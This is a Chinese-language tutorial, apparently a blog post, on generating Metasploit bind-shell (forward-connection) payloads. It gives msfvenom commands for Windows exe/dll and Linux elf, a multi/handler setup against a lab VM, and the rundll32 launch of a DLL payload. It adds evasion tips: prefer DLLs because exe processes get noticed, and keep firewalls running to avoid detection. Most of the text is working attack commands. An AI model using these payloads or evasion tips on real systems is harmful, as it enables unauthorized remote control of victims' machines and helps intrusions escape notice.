- 使用场景:
场景还是得具体看,⽐如⽬标机器不给其他除特定端⼝外的端⼝出站,那就 只能能正向;还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。
生成exe文件
-
msfvenom ⽣成正向 Paylaodmsfvenom -p windows/meterpreter/bind_tcp LPORT= -f exe >/root/bind_xx.exemsfvenom -p windows/x64/meterpreter/bind_tcp LPORT= -f exe >/root/bind_xx.exemsfvenom -p windows/meterpreter/bind_tcp LPORT= -f dll >/root/bind_xx.dllmsfvenom -p windows/x64/meterpreter/bind_tcp LPORT= -f dll >/root/bind_xx.dllmsfvenom -p linux/x64/meterpreter/bind_tcp LPORT= -f elf >/root/bind_xx.elfmsfvenom -p linux/x86/meterpreter/bind_tcp LPORT= -f elf >/root/bind_xx.elf根据靶机系统选择相应的命令,我的靶机用的是win10 x64的系统,所以我选择这条命令:msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -f exe >bind.exe端口(lport)随便设置就行将生成的文件在靶机中打开,利用netstat -ano查看打开的端口可以看到目标端口已经打开接下来打开msfconsole对虚拟机进⾏连接(前提是对⽅防火墙是关闭了的):相关命令:msfconsoleuse exploit/multi/handler //进入exploit模块set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议show optionsset lport 5555 //自己设置的端口set rhost 192.168.5.144 //靶机的iprun //运行
![](https://img-blog.csdnimg.cn/direct/0cc7372ed36d4b658766160d9645cb94.png)
成功获取shell权限:
这个时候就反弹回来了⼀个Meterpreter
会话回来!
同时,靶机win10
那边就没有对
5555
端⼝进⾏连接了!
![](https://img-blog.csdnimg.cn/direct/4734c7dec1c04eb5abf6d64cc729336d.png)
![](https://img-blog.csdnimg.cn/direct/d63fa151ba1046ba878a1d6713024913.png)
因为⽤了
5555
端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了! 也就是
说,如果连接失败了,那么就再运⾏然后再连接⼀次!
这是
Metasploit
⽣成正向的过程!
尽量不要⽣成
exe
在真实环境中,如果使⽤
msfvenom
⽣成了⼀个正向
Paylaod
格式是
exe
,那么在进程中就会暴露!
![](https://img-blog.csdnimg.cn/direct/c52f8893e8204287b29ff63d583aa551.png)
⼀般⽤就⽤
dll
!
要运⾏
dll
必须使⽤
rundll32.exe
来
start:
rundll32.exe
文件在
C:\Windows\System32\rundll32.exe:
命令:rundll32.exe C:\Users\xiao\Desktop\bind.dll,start
使用方法就是
rundll32.exe xxx.dll,Start
![](https://img-blog.csdnimg.cn/direct/3a6c3f6aa70c449d87fde80bdfbe7dc5.png)
⽽
Meterpreter
这边也是反弹了⼀个
shell
回来
这就是正向连接
![](https://img-blog.csdnimg.cn/direct/b4c70715c6084707a65cf7d0373ad682.png)